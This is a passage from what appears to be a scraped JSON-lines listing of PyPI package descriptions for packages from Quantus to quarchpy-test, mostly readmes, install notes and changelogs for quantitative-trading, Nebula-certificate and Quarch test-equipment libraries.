follows:defyour_own_callable(model,models,targets,**kwargs)->np.ndarray\"\"\"Logic goes here to compute the attributions and return anexplanation in the same shape as x_batch (np.array),(flatten channels if necessary).\"\"\"returnexplanation(model,x_batch,y_batch)scores=metric(model=model,x_batch=x_batch,y_batch=y_batch,device=device,explain_func=your_own_callable)Run large-scale evaluationQuantus also provides high-level functionality to support large-scale evaluations,\ne.g., multiple XAI methods, multifaceted evaluation through several metrics, or a combination thereof. To utilisequantus.evaluate(), you simply need to define two things:TheMetricsyou would like to use for evaluation (each__init__parameter configuration counts as its own metric):metrics={\"max-sensitivity-10\":quantus.MaxSensitivity(nr_samples=10),\"max-sensitivity-20\":quantus.MaxSensitivity(nr_samples=20),\"region-perturbation\":quantus.RegionPerturbation(),}TheXAI methodsyou would like to evaluate, e.g., adictwith pre-computed attributions:xai_methods={\"Saliency\":a_batch_saliency,\"IntegratedGradients\":a_batch_intgrad}You can then simply run a large-scale evaluation as follows (this aggregates the result bynp.meanaveraging):importnumpyasnpresults=quantus.evaluate(metrics=metrics,xai_methods=xai_methods,agg_func=np.mean,model=model,x_batch=x_batch,y_batch=y_batch,**{\"softmax\":False,})Please seeGetting started tutorialto run code similar to this example. For more information on how to customise metrics and extend Quantus' functionality, please seeGetting started guide.TutorialsFurther tutorials are available that showcase the many types of analysis that can be done using Quantus.\nFor this purpose, please see notebooks in thetutorialsfolder which includes examples such as:All Metrics ImageNet Example: shows how to instantiate the different metrics for ImageNet datasetMetric Parameterisation Analysis: explores how sensitive a metric could be to its hyperparametersRobustness Analysis Model Training: measures robustness of explanations as model accuracy increasesFull Quantification with Quantus: example of benchmarking explanation methodsTabular Data Example: example of how to use Quantus with tabular dataQuantus and TensorFlow Data Example: showcases how to use Quantus with TensorFlow... and more.ContributingWe welcome any sort of contribution to Quantus! For a detailed contribution guide, please refer toContributingdocumentation first.If you have any developer-related questions, pleaseopen an issueor write us athedstroem.anna@gmail.com."} +{"package": "quant-util", "pacakge-description": "No description available on PyPI."} +{"package": "quantutils", "pacakge-description": "quantutilsQuickStartInstallationpipinstallquantutilsUsageimportquantutilsasqsqs.gen_daily_profit_df(df,\"Name\")"} +{"package": "quant-vnpy", "pacakge-description": "quant vnpy\u4e00\u3001 \u7b80\u4ecb1. \u529f\u80fd\u7b80\u4ecb\u672c\u5de5\u5177\u5305\u662f\u57fa\u4e8evnpy\u7684\u56de\u6d4b\u5e93\u7684\u4e00\u4e9b\u589e\u5f3a\u51fd\u6570quant_vnpy \u76ee\u5f55\u5305\u542b\u5404\u79cd\u589e\u5f3a\u51fd\u6570\u53ca\u7c7b\u5e93strategies \u4e3a\u7b56\u7565\u5e932. \u7248\u672c\u5386\u53f22021-01-22 v0.6.0feat: add track performance feature.2021-01-19 v0.5.12fix: TargetPosAndPriceTemplate current_pos -> target_pos by one step\nfix: strategy_class_name wrong2021-01-15 v0.5.5fix: add exception handle and logger on TradeDataCollector\nfix: TargetPosAndPriceTemplate current_pos -> target_pos by one step2021-01-14 v0.5.1feat: record backtest statsfeat: add default rate for backtestfix: DCE\u591c\u76d8\u4ea4\u6613\u65e5\u671f\u4e3a\u4e0b\u4e00\u4ea4\u6613\u65e5\uff0c\u5c06\u4f1a\u88ab\u91cd\u5199\u4e3a\u5f53\u524d\u7cfb\u7edf\u65e5\u671f\nfix: \u4fee\u590d\u8de8\u65e5\u62a5\u8868\u7edf\u8ba1\u9519\u8beffix: cross_limit_method param missing for file_name_func functionfix: \u4e3b\u529b\u5408\u7ea6\u3001\u6b21\u4e3b\u529b\u5408\u7ea6\u6570\u636e\u590d\u6743\u6574\u7406 bug2021-01-08 v0.5.0refactor: merge portfolio run_backtest and cta run_backtest2021-01-07 v0.4.13feat: set_strategy_status(StrategyStatusEnum.Stopped)feat: monitor add setting2021-01-05 v0.4.11refactor: longer interval of plotly.io._orca.cleanupfeat: backtest: output param file if it's available2021-01-04 v0.4.10fix: MACDSignal2021-01-04 v0.4.9fix: check not strategy_status_monitor.is_alive()2020-12-27 v0.4.8feat: backtest: reset_index on result_dffix: portfolio template, last_order_dt -> dictfeat: add new TargetPosAndPriceTemplate, MACrossSignal2020-12-27 v0.4.7feat: backtest: default ratefeat: backtest: available filter for return_drawdown_ratio < 2 and np.round for some stats items2020-12-25 v0.4.6feat: backtest: auto search symbol sizefix: report gl calc wrong in some cases2020-12-23 v0.4.4fix: report holding pos status calc wrongfix: stop_opening_pos on templates2020-12-22 v0.4.2fix: order_data_collector error on portfolio_strategy.template2020-12-21 v0.4.1fix: open_price -> last_price2020-12-18 v0.4.0feat: support user_name, broker_idfeat: add last_order_dt on template2020-12-18 v0.3.9fix: orm close connectionfeat: position daily stat.2020-12-16 v0.3.7feat: add CrossLimitMethod.fix_price for backtestfeat: add quant_vnpy.backtest.cta_strategy.template.CtaTemplatefeat: backtest cross price method2020-12-14 v0.3.2add position monitor2020-12-11 v0.2.16feat: on_tick active on_bar by bg on template.pyfeat: add OrderDataCollector, TradeDataCollector classfeat: add stop_if_pos_2_0 on cta templatefix: bug fix of on_tick and report error2020-12-04 v0.2.8feat: more readable log2020-11-30 v0.2.7feat: orm add symbols2020-11-27 v0.2.3fix: bug fix on log format2020-11-25 v0.2.2fix: bug fix on on_stop of portfolio template2020-11-25 v0.2.1feat: add strategy status monitor2020-11-24 v0.1.10feat: add bar_count2020-11-20 v0.1.8bug fix on portfolio's template2020-11-17 v0.1.7feat: \u5bf9 cta \u53ca portfolio \u589e\u52a0 template \u6a21\u677f\u7c7bfeat: signal \u589e\u52a0 0 \u5224\u65ad \u5f53 0 \u65f6\uff0c\u9ed8\u8ba4\u4e3a default \u503cfeat: add current_bar for cta, portfolio's template classesfix: template bugs2020-11-15 v0.1.2feat: \u6700\u65b0\u4f9d\u8d56\u7248\u672c IBATS_Common>=0.20.8\uff0c\u6700\u65b0\u652f\u6301\u9053 vnpy 2.1.7 \u7248\u672cfeat: \u8c03\u6574 INSTRUMENT_TRADE_TIME_PAIR_DIC \u9053 constants.py2020-11-10 v0.1.0feat: \u57fa\u4e8evnpy 2.1.6\u8fdb\u884c\u7684\u529f\u80fd\u589e\u5f3a\u3002\u6b64\u524d\u7248\u672c\u4e0d\u652f\u6301\u3002\u4e8c\u3001 \u73af\u5883\u8bbe\u7f6e\u53ca\u7ec4\u4ef6\u5b89\u88c5\uff08\u9996\u6b21\u8fd0\u884c\u524d\u9700\u8981\uff091. \u7cfb\u7edf\u73af\u5883\u5305\u542bAnaconda\u6216 Miniconda\uff08python 3.7 \u7248\u672c\uff092. \u5b89\u88c5vnpy 2.1.6\u6216\u4ee5\u4e0a\u7248\u672c\\3. \u8fd0\u884c\u5b89\u88c5\u76f8\u5173\u7ec4\u4ef6pip isntall -r requirement.txt\nconda install -c plotly plotly-orca\nconda install -c plotly python-kaleido\u5982\u679c\u6267\u884c\u9047\u5230\u95ee\u9898\u53ef\u5206\u522b\u6267\u884c\u5982\u4e0b\uff1a\u901a\u7528\u7ec4\u4ef6pip install -r requirement.txtorca \u7ec4\u4ef6\norca \u7ec4\u4ef6\u4e3a\u56de\u6d4b\u529f\u80fd\u4e2d\u4fdd\u5b58\u56de\u6d4b\u89c6\u56fe\u7ed3\u679c\u7684\u7ec4\u4ef6\uff0cwindows\u7cfb\u7edf\u6027\u9700\u8981\u5355\u72ec\u5b89\u88c5\uff0c\u624d\u53ef\u4fdd\u8bc1\u529f\u80fd\u6b63\u5e38\u4f7f\u7528\u5b89\u88c5\u6b65\u9aa4\u5982\u4e0b\uff1a\u5b89\u88c5\u7ec4\u4ef6\u5305conda install -c plotly plotly-orca\u4e0b\u8f7d\u5e76\u5b89\u88c5 orca \u5e94\u7528\u7ec4\u4ef6\u4e0b\u8f7d\u5730\u5740\uff1aorca\u7ec4\u4ef6\u5b89\u88c5\u540e\u8bbe\u7f6e\u8bdd\u5c31\u73af\u5883\u53d8\u4e86 Path \u52a0\u5165\u76f8\u5e94\u8def\u5f84\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0bwindow10\u64cd\u4f5c\u7cfb\u7edf orca \u7ec4\u4ef6\u5c06\u88ab\u5b89\u88c5\u5728\u5982\u4e0b\u8def\u5f84\uff1aC:\\Users\\mmmaaaggg\\AppData\\Local\\Programs\\orca\u6279\u91cf\u5173\u95ed orca \u8fdb\u7a0b\u65b9\u6cd5ps-ef|greporca|grep-vgrep|awk'{print $2}'|xargskill-9MD\u6587\u4ef6\u8f6cword\u6587\u6863\u5de5\u5177\u5230pandoc\u5b98\u7f51\u4e0b\u8f7d\u5bf9\u5e94\u7684\u8f6f\u4ef6\u5e76\u5b89\u88c5\u540e\u5373\u53ef\u8fd0\u884c Scripts\\md_2_docx.bat \u811a\u672c\u4e09\u3001 \u5e38\u7528\u547d\u4ee41. \u5207\u6362\u8fdc\u7a0b\u4ed3\u5e93\u5730\u5740\u65b9\u6cd5>git remote\norigin\n>git remote get-url --all origin\ngit@192.168.10.117:quant/quant_vnpy.git\n>git remote set-url origin http://209386rt46.51vip.biz:23987/quant/quant_vnpy.git\n>git pull\nremote: Enumerating objects: 8, done.\nremote: Counting objects: 25% (2/8)\nremote: Counting objects: 100% (8/8), done.\nremote: Total 72 (delta 8), reused 8 (delta 8), pack-reused 64\nUnpacking objects: \n6% (5/72)Unpacking objects: \n34% (25/72)Unpacking objects: \nUnpacking objects: 100% (72/72), 17.93 KiB | 23.00 KiB/s, done.\nFrom http://209386rt46.51vip.biz:23987/quant/From http://209386rt46.51vip.biz:23987/quant/quant_vnpy\n cb6c014..1afe166 master -> origin/master\nUpdating cb6c014..1afe166\nFast-forward\n README.md | 7 +\n ...\n 8 files changed, 404 insertions(+), 106 deletions(-)2. \u6570\u636e\u5e93 dump \u6570\u636e\u5907\u4efd\u4e3b\u529b\u5408\u7ea6\"c:\\Program Files\\MySQL\\MySQL Server 8.0\\bin\\mysqldump.exe\" -u mg -p --databases vnpy dbbardata --where=\"symbol in ('rb9999', 'hc9999', 'i9999') and `interval`='1m'\" > dbbardata_dump.sql\u5907\u4efd\u4e3b\u529b\uff0c\u6b21\u4e3b\u529b\u5408\u7ea6\"c:\\Program Files\\MySQL\\MySQL Server 8.0\\bin\\mysqldump.exe\" -u mg -p vnpy dbbardata --where=\"(symbol like'%9999' or symbol like'%8888') and `interval`='1m'\" > dbbardata_dump.sql3. \u538b\u7f29\u547d\u4ee4zip-r0q/media/mg/Data/output_20201220.zipoutput4. \u72ec\u7acb\u542f\u52a8\u4ea4\u6613\u754c\u9762d:\\ide\\vnstudio\\python.exe -m vnstation runtrader \"{'gateway': {'CTP': true}, 'app': {'CtaStrategy': true, 'PortfolioStrategy': true, 'PortfolioManager': true}, 'path': 'D:\\\\TradeTools\\\\vnpy\\\\jianxin_11859077'}\"\u56db\u3001 \u5404\u4e2a\u7248\u672c\u5e38\u89c1\u9519\u8bef2.0.3\u7248\u672c\u9519\u8bef\u63d0\u793a\u6846\u592a\u957f\uff0c\u65e0\u6cd5\u770b\u5230\u9519\u8bef\u4fe1\u606fpython.exe -m vnstation\u9519\u8bef\u63d0\u793a\uff1aValueError: numpy.ufunc size changed, may indicate binary incompatibility. Expected 216 from C header, got 192 from PyObject\n\u89e3\u51b3\u65b9\u6cd5\uff1aScripts\\pip.exe install numpy==1.16.1 --user\u7a7f\u900f\u5f0f\u6d4b\u8bd5\u901a\u4e0d\u8fc7\uff0c\u91c7\u96c6\u4e0d\u5230CPU\u3001\u786c\u76d8\u3001BIOS\u4fe1\u606f\n\u4fee\u6539\u73af\u5883\u53d8\u91cf\n\u589e\u52a0\u76ee\u5f55C:\\Windows\\SysWOW64\\wbem"} +{"package": "quant-wheel", "pacakge-description": "quant-wheelA template repository for building python packages. Please replace$packagewith the package's name.Installation$pipinstallquant-wheelSee AlsoGithub repositoryhttps://github.com/Chitaoji/quant-wheel/PyPI projecthttps://pypi.org/project/quant-wheel/LicenseThis project falls under the BSD 3-Clause License.Historyv0.0.0Initial release."} +{"package": "quantworks", "pacakge-description": "QuantWorksQuantWorks is anevent driven algorithmic tradingframework. It is a fork ofPyAlgoTrade(seeMotivation).QuantWorks provides a Python API forstrategyauthoring,backtesting,paper trading, and of courselive tradingvia theBrokerinterface.To get started using QuantWorks, please take a look at the originalPyAlgoTradetutorialand thefull documentation.Main FeaturesPython 3 developmentPython 2 support isNOTguaranteed in any capacity.Event driven.Supports Market, Limit, Stop and StopLimit orders.Supports any type of time-series data in Pandas or CSV format (like Yahoo! Finance, Google Finance, Quandl and NinjaTrader), as well as database (i.e. sqlite).Technical indicators and filters like SMA, WMA, EMA, RSI, Bollinger Bands, Hurst exponent and others.Performance metrics like Sharpe ratio and drawdown analysis.Event profiler.TA-Lib integration.MotivationQuantWorks is a fork ofPyAlgoTradeby@gbeced. This project aims to be:Modern: first-classPython 3development (Python 2 is EOL as of 2020)Extensible: as a framework, robust extension support is a must, and we encourage users of QuantWorks to give back by publishing their extensions (seeExtensions)Easy to Develop: state-of-the-art tooling (pytest, poetry, travis) and approachable design principles should make it easy for newcomers to contribute.Open: as a fork of an Apache 2.0 license project, QuantWorks maintains the spirit of FOSS development.CONTRIBUTING.md forthcomingDevelopmentQuantWorks is developed and tested using 3.7 and depends on:NumPy and SciPy.pytz.dateutil.requests.matplotlibfor plotting support.ws4pyfor Bitstamp support.tornadofor Bitstamp support.tweepyfor Twitter support.Developer ergonomics are provided bypoetrypytesttoxtravis-ciExtensionsBitstamp(bitcoin) live trading is implemented by thequantworks-bitstamppackage (https://pypi.org/project/quantworks-bitcoin/)Twitter real-time feeds are supported via thequantworks-twitterpackage (https://pypi.org/project/quantworks-twitter/)"} +{"package": "quantworks-bitcoin", "pacakge-description": "No description available on PyPI."} +{"package": "quantworks-twitter", "pacakge-description": "No description available on PyPI."} +{"package": "quant-wxk-py", "pacakge-description": "A small example package"} +{"package": "quantx", "pacakge-description": "UNKNOWN"} +{"package": "quanty", "pacakge-description": "No description available on PyPI."} +{"package": "quantzbrapi", "pacakge-description": "No description available on PyPI."} +{"package": "quantzero", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quantzoo", "pacakge-description": "\ud83d\udd25QuantZoo\ud83d\udd25Installpipinstall-UquantzooDocsUsagesimport quantzoo\u4e2a\u4eba\u8d22\u5bcc\u91cf\u5316\u6295\u8d44\u7cfb\u7edf\u7c7b\u63a8\u8350\u7cfb\u7edfTODO=======\nHistory0.0.0 (2022-04-18)First release on PyPI."} +{"package": "quantzsl", "pacakge-description": "No description available on PyPI."} +{"package": "quanutm-isl", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quanyouzheng", "pacakge-description": "No description available on PyPI."} +{"package": "quanzhou", "pacakge-description": "No description available on PyPI."} +{"package": "quao", "pacakge-description": "quaoquao is a supporting library for Quantum Computing.InstallationInstall quao with pip (Python >=3.10)pipinstallquaoUsage/ExamplesfromquaoimportBackend,RequestData,Utils#Definesdknamesdk=\"qiskit\"#Pre-processinginputdatadefpre_process(input):data=RequestData(input,sdk)returndata#Post-processingoutputdatadefpost_process(job):output=Utils.counts_post_process(job)returnoutputdefhandle(event,context):#1.Pre-processingrequestData=pre_process(event)#2.GenerateQuantumCircuitqc=generate_circuit(requestData.input)#3.VerifyandgetBackendinformationbackend=Backend(requestData,qc)#4.Submitjobandwaitupto1minforjobtocomplete.job=backend.submit_job(qc)#5.Post-processifjob.jobResult:job=post_process(job)response=Utils.generate_response(job)#6.SendbacktheresultreturnresponseAuthorsCITYNOW Co. Ltd.DocumentationTBA"} +{"package": "quara", "pacakge-description": "Quara, which stands for \u201cQuantum Characterization\u201d, is an open-source library for characterizing elementary quantum operations. Currently protocols of standard tomography for quantum states, POVMs, and gates are implemented.Documentation:https://quara.readthedocs.io/en/stable/Tutorials:https://github.com/tknrsgym/quara/tree/master/tutorialsSource code:https://github.com/tknrsgym/quaraBug reports:https://github.com/tknrsgym/quara/issuesContributing:https://github.com/tknrsgym/quara/blob/master/docs/contributing.rstInstallPython version:3.7+pip install quaraUse with other optimization parsers and solversQuara can also be used with other optimization parsers and solvers. The currently supported combinations are as follows:parsersolverinstallCVXPYMOSEKSeethe CVXPY websiteInterface from different packagesQuara supports the wrappers for executing standard tomography from several packages. To use this wrapper, install the package to be used as follows:Qiskit:pip install qiskitQuTiP:pip install qutipForest:Install Forest SDK, pyQuil, QVM, and Quil Compiler. Seethe pyQuil websitefor installation instructions.See the tutorial for detailed instructions.Using Quara\u2019s standard tomography features from QiskitUsing Quara\u2019s standard tomography features from QuTiPUsing Quara\u2019s standard tomography features from Forest [1qubit/2qubit]CitationIf you use Quara in your research, please cite as per the includedCITATION.cff file.LicenseApache License 2.0LICENSESupportsQuara development is supported byJST, PRESTO Grant Number JPMJPR1915, Japan."} +{"package": "quara-creds", "pacakge-description": "QUARA CredsCLI usageDisplay helpSeveral subcommands are available. The--helpoption is available at different levels:# General helppync--help# cert command group helppynccert--help# cert sign subcommand helppynccertsign--helpInitialize environmentInitialize with default configurationpyncinitReset configurationpyncinit--forceConfigure authorities from a JSON file (either a path or an URL):pyncinit--authoritieshttps://example.com/authorities.jsonManage keypairsCreate a new keypair for current user:pynckeygenCreate a new keypair for a different user:pynckeygen-ntestList available keypairspynckeylistDisplay a public keypynckeyshow-ntestDisplay a private keypynckeyshow-ntest--privateManager certificate authoritiesList available authorities:pynccalistShow authorities details:pynccashowShow authorities certificates:pynccashow--pemNebula certs examplesCreate a new CA and a sign a new certificatefromquara.creds.nebulaimport(EncryptionKeyPair,SigningCAOptions,SigningOptions,sign_ca_certificate,sign_certificate,verify_certificate,)# Create a new CAca_keypair,ca_crt=sign_ca_certificate(options=SigningCAOptions(Name=\"test\"))# Create a new keypair for the certificateenc_keypair=EncryptionKeyPair()# Sign a new certificatenew_crt=sign_certificate(ca_key=ca_keypair,ca_crt=ca_crt,public_key=enc_keypair,options=SigningOptions(Name=\"test\",Ip=\"10.100.100.10/24\",),)# Write files to diskca_crt.write_pem_file(\"ca.crt\")ca_keypair.write_private_key(\"ca.key\")new_crt.write_pem_file(\"node.crt\")enc_keypair.write_private_key(\"node.key\")enc_keypair.write_public_key(\"node.pub\")# Verify that the certificate is validverify_certificate(ca_crt=ca_crt,crt=new_crt)This example generates 5 files:ca.crt: The CA certificate created during the first step.ca.key: The private key of the CA. The public key is also present within this file.node.crt: The certificate created during the second step.node.key: The private key associated with the certificate. Unlike CA private keys, the public key is not present within the file.node.pub: The public key associated with the certificate. The public key is also embedded within the certificate.Load an existing CA and sign a new certificatefromquara.creds.nebulaimport(Certificate,EncryptionKeyPair,SigningKeyPair,SigningOptions,sign_certificate,verify_certificate,)# Load CA certificateca_crt=Certificate.from_file(\"ca.crt\")# Load CA keypairca_keypair=SigningKeyPair.from_file(\"ca.key\")# Create a new keypair for the certificateenc_keypair=EncryptionKeyPair()# Sign a new certificatenew_crt=sign_certificate(ca_key=ca_keypair,ca_crt=ca_crt,public_key=enc_keypair,options=SigningOptions(Name=\"test\",Ip=\"10.100.100.10/24\",),)# Write files to disknew_crt.write_pem_file(\"node.crt\")enc_keypair.write_private_key(\"node.key\")enc_keypair.write_public_key(\"node.pub\")# Verify that the certificate is validverify_certificate(ca_crt=ca_crt,crt=new_crt)In this case, only 3 files are created, as the CA certificate and the CA key already existed before.Load an existing CA, an existing public key, and sign a new certificatefromquara.creds.nebulaimport(Certificate,PublicEncryptionKey,SigningKeyPair,SigningOptions,sign_certificate,verify_certificate,)# Load CA certificateca_crt=Certificate.from_file(\"ca.crt\")# Load CA keypairca_keypair=SigningKeyPair.from_file(\"ca.key\")# Load public key from filepub_key=PublicEncryptionKey.from_file(\"node.pub\")# Sign a new certificatenew_crt=sign_certificate(ca_key=ca_keypair,ca_crt=ca_crt,public_key=pub_key,options=SigningOptions(Name=\"test\",Ip=\"10.100.100.10/24\",),)# Write files to disknew_crt.write_pem_file(\"node.crt\")# Verify that the certificate is validverify_certificate(ca_crt=ca_crt,crt=new_crt)In this case, only the certificate file is written to disk, as all other information was known before issuing the certificate."} +{"package": "quarantine", "pacakge-description": "Your project\u2019s description"} +{"package": "quara-poetry-core-next", "pacakge-description": "Poetry CoreAPEP 517build backend implementation developed forPoetry. This project is intended to be a light weight, fully compliant,\nself-contained package allowing PEP 517 compatible build frontends to build Poetry managed projects.UsageIn most cases, the usage of this package is transparent to the end-user as it is either made use by Poetry itself\nor a PEP 517 frontend (eg:pip).In order to enable the usepoetry-coreas your build backend, the following snippet must be present in your\nproject'spyproject.tomlfile.[build-system]requires=[\"poetry-core\"]build-backend=\"poetry.core.masonry.api\"Once this is present, a PEP 517 frontend likepipcan build and install your project from source without the need\nfor Poetry or any of it's dependencies.# install to current environmentpipinstall/path/to/poetry/managed/project# build a wheel packagepipwheel/path/to/poetry/managed/projectWhy is this required?Prior to the release of version1.1.0, Poetry was a build as a project management tool that included a PEP 517\nbuild backend. This was inefficient and time consuming in majority cases a PEP 517 build was required. For example,\nbothpipandtox(with isolated builds) would install Poetry and all dependencies it required. Most of these\ndependencies are not required when the objective is to simply build either a source or binary distribution of your\nproject.In order to improve the above situation,poetry-corewas created. Shared functionality pertaining to PEP 517 build\nbackends, including reading lock file,pyproject.tomland building wheel/sdist, were implemented in this package. This\nmakes PEP 517 builds extremely fast for Poetry managed packages."} +{"package": "quarc", "pacakge-description": "Starts a server that allows python code to be run within the web applications found athttps://quarc.services."} +{"package": "quarc-gateway", "pacakge-description": "This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details."} +{"package": "quarchCalibration", "pacakge-description": "QuarchCalibrationQuarchCalibration is a python package that allows calibration of Quarch modules.Change Log1.1.10Minor bug fixesNoise test made standalone and now uses QISUpdated production filepath of calibration report files1.1.9Minor bug fixesAdded support for QTL2910-021.1.8Updates for AC CalibrationMinor bug fixes1.1.7Minor error logging fixMinor device selection for AC calibration fix1.1.6Uptades for AC CalibrationMinor bug fixes1.1.5-Bug fixes1.1.4Fixes for edsff calibrationFixes for modules with no noise test1.1.3Added QTL1944_06Added Noise Test.1.1.2Added QTL2887 Gen5 EDSFF Fixture (E1)Added QTL2888 GEN5 EDSFF Fixture (E3)1.1.1Added QTL2674 EDSFF Fixture (E3)1.1.0Added QTL2788 Gen 5 SFF PAM Fixture calibration1.0.0Added QTL2673 EDSFF Fixture (E1)fixes for import bug0.0.0Initial separation of calibration from QuarchPy"} +{"package": "quarchpy", "pacakge-description": "QuarchpyQuarchPy is a python package designed to provide an easy-to-use API which will work seamlessly over any connection option: USB, Serial and LAN. With it, you can create your own scripts for controlling Quarch devices - without having to worry about the low-level code involved with communication.The package contains all prerequisites needed as a single PyPI project, which can be installed from the python online repository using PIP. This makes it easy to install and update, while also providing you with full access to the source code if you want to make changes or additions.QuarchPy can also communicate to the device via QIS (Quarch Instrument Server), QPS (Quarch Power Studio), or simply using Python scripts. Both QIS and QPS are included with the QuarchPy Package - they are ready to use (Java and drivers may also be needed).Change Log2.1.20Improved direct IP scanning for quarch modules.New QPS v1.37 and QIS v1.402.1.19Imporoved QIS streamingBug fixesAdded zeroconf, numpy and pandas as requirements2.1.18Minor bug fix2.1.17Improved QIS QPS launching on Linux sytemsSystem debug for linux systems2.1.16FIO mb/s parsingImproved QIS QPS launching2.1.15minor bug fix2.1.14minor bug fixes and logging improvements.2.1.13New QPS v1.36New QIS v1.39minor bug fixes and logging improvements.2.1.12New QPS v1.35New QIS v1.38minor bug fixes and removal of depracated code.2.1.11New QPS v1.32New QIS v1.37quarchpy.run module_debug added for checking state of module and DUT2.1.10New QPS v1.29New QIS v1.332.1.8New QPS v1.282.1.7New QPS v1.27New QIS v1.322.1.6New QPS v1.26New QIS v1.312.1.5New QPS v1.242.1.4New QPS v1.23New QIS v1.292.1.3New QPS v1.22modules on the network can now be connected to using conType:QTLNumber eg. TCP:QTL1999-02-001.fixed QIS not closing with QPS when launch with by QPScloseConnection added to QIS apidisplay table formats multiline items and handles empty cells2.1.2QPS v1.20QIS v1.192.1.1Seperation of QIS module scan and QIS select deviceAdded getQuarchDevice which is a wrapper around quarchDevice that allows connections to sub-devices in array controllers over all connection typesVersion compare updated to use __version__ rather than pkg_resourcesSeperated the SystenTest (debug_info) into seperate parts with flags to allow the user to skip certain parts. This allows the test to be run without user interaction of selecting a module.2.1.0logging improvementsusb locked devices fix for CentOS, Ubuntu, and Fedora2.0.22Calibration and QCS removed from quarchpy and are not in their own packagesNew command \u201cpython -m quarchpy.run debug -usbfix\u201d sets USB rules to fix quarch modules appearing as locked devices on Linux OS2.0.21new QIS v1.232.0.20New modules added to calibration, wiring prompt added, logging improvementsFixes for PAM streaming using QISAdded Quarchpy.run list_drivesImproved communication for connection_QPSImproved QCS debuggingReworked QCS drive detection for upcoming custom drive detection\u201cquarchpy.run list_drives\u201d command added2.0.19QPS v1.17Quarchpy run terminal runs the simple python terminal to talk to modulesScan Specific IP address for Quarch module via QIS/QPS addedUpdated performance class for new QCS testsFixed Centos QCS drive selection bugImproved QCS connection classesImproved features for QCSMinor bug fixes2.0.18QPS 1.13Iomenter drive location bugfixUnits added to stats export from QPSChanged QCS tests to work off of a python formatUpdated drive detection in QCSUpdated communication to TLS2.0.16QPS 1.112.0.15QIS v1.19.03 and QPS 1.10.12Updated debug info testSnapshots and stats from QPS functions addedCalibration updates2.0.14QPS annotations through quarchpy improvements2.0.13Python2 bug fixesUI tidy upNew custom annotations and comments QPS API2.0.12Fixed issue with array module scan over UDP outside of subnetBug fix for HD connection via USB in linuxAdded headless launch of QISAdded Shinx auto documentationFixed issue with USB command response timeout in longer QCS testsFixed issue where UDP locate parser was using the legacy header, not the quarch fieldsImproved qurchpy.run oarsing and help generationFixed syntax warnings for string literal comparisonsCalibration wait for specific module uptime and report file updates2.0.11Improved list selection for devicesFixed bug when scanning for devices within an ArrayModule detection fixes for QCS and PAM/Rev-B HDClean up of calibration switchbox code and user logging2.0.10QCS server logging cleaned upAdditional platform tests added to debug_info testCleaned up print() statements and replaced with logging callsHelp message added to quarchpy.run commandModule detection fixes for QCSImproved calibration promptsAdded initial calibration stubs for the PAMQCS improvements to linux drive enumeration tests2.0.9Significant QCS additions including power testingAdded remote switchbox to calibration utilityVarious minor bug fixes and improvements to calibration utility2.0.8Added readme.md for PyPi descriptionFixed bug in QIS when checking if QIS is runningVarious minor additions for QCS2.0.7Changes since 2.0.2Minor bug fixesCalibration ChangesQIS folder gone, QIS now in QPS onlyRun package addedUpdate quarchpy addedSystemTest improvementsUI changes, input validation, smart port select2.0.2UI Package addedConnection over TCP for python addedLogging on devicesDrive test core added2.0.0Major folder restructureAdded test center supportDetected streaming devicesAdded latest qps1.09 and qisMinor bug fixes1.8.0Tab to white space convertUpdated __init__ file to co-allign with python practicesUpdated project structureAdded documents for changes and Script LocationsDisk selection updateCompatibility with Python 3 and Linux Improved!1.7.6Fixes bug with usb connection1.7.5Fixed USB DLL CompatibilityFixed potential path issues with Qis and Qps open1.7.4Updated to QPS 1.081.7.3Additional Bug Fixes1.7.2Bug fixing timings for QIS (LINUX + WINDOWS)1.7.1Updated FIO for use with Linux and to allow arguments without valuesFixes path problem on LinuxFixes FIO on Linux1.7.0Improved compatability with Windows and Ubuntu1.6.1Updating USB ScanAdding functionality to specify OS bit architecture (windows)1.6.0custom $scan IPfixes QIS detectionimplements custom separator for stream filesBug fix - QIS Load1.5.4Updating README and LICENSE1.5.2Bug Fix - Case sensitivity issue with devices1.5.1Additional Bug Fixes1.5.0Integration with FIOAdditional QPS functionalityAdded device search timeout1.4.1Fixed the wmi error when importing quarchpy.1.4.0\n\u2014Integration with QPSsupports Iometer testingAdditional fixes for wait times1.3.4Implemented resampling and a better way to launch QIS from the script.1.3.3Implements isQisRunningImplements qisInterfaceChanges startLocalQIS to startLocalQisFixes a bug in QIS interface listDevices that didn\u2019t allow it to work with Python 31.3.2Bug Fix running QIS locally1.3.1Implements startLocalQISPacks QIS v1.6 - fixes the bugs with QIS >v1.6 and multiple modulesUpdates quarchPPM (connection_specific)Compatible with x6 PPM QIS stream.1.2.0Changes to object model"} +{"package": "quarchpy-test", "pacakge-description": "QuarchpyQuarchPy is a python package designed to provide an easy-to-use API which will work seamlessly over any connection option: USB, Serial and LAN. With it, you can create your own scripts for controlling Quarch devices - without having to worry about the low-level code involved with communication.The package contains all prerequisites needed as a single PyPI project, which can be installed from the python online repository using PIP. This makes it easy to install and update, while also providing you with full access to the source code if you want to make changes or additions.QuarchPy can also communicate to the device via QIS (Quarch Instrument Server), QPS (Quarch Power Studio), or simply using Python scripts. Both QIS and QPS are included with the QuarchPy Package - they are ready to use (Java and drivers may also be needed).Change Log2.1.3modules on the network can now be connected to using conType:QTLNumber eg. TCP:QTL1999-02-001.fixed QIS not closing with QPS when launch with by QPScloseConnection added to QIS apidisplay table formats multiline items and handles empty cells2.1.2QPS v1.20QIS v1.192.1.1Seperation of QIS module scan and QIS select deviceAdded getQuarchDevice which is a wrapper around quarchDevice that allows connections to sub-devices in array controllers over all connection typesVersion compare updated to use __version__ rather than pkg_resourcesSeperated the SystenTest (debug_info) into seperate parts with flags to allow the user to skip certain parts. This allows the test to be run without user interaction of selecting a module.2.1.0logging improvementsusb locked devices fix for CentOS, Ubuntu, and Fedora2.0.22Calibration and QCS removed from quarchpy and are not in their own packagesNew command \u201cpython -m quarchpy.run debug -usbfix\u201d sets USB rules to fix quarch modules appearing as locked devices on Linux OS2.0.21new QIS v1.232.0.20New modules added to calibration, wiring prompt added, logging improvementsFixes for PAM streaming using QISAdded Quarchpy.run list_drivesImproved communication for connection_QPSImproved QCS debuggingReworked QCS drive detection for upcoming custom drive detection\u201cquarchpy.run list_drives\u201d command added2.0.19QPS 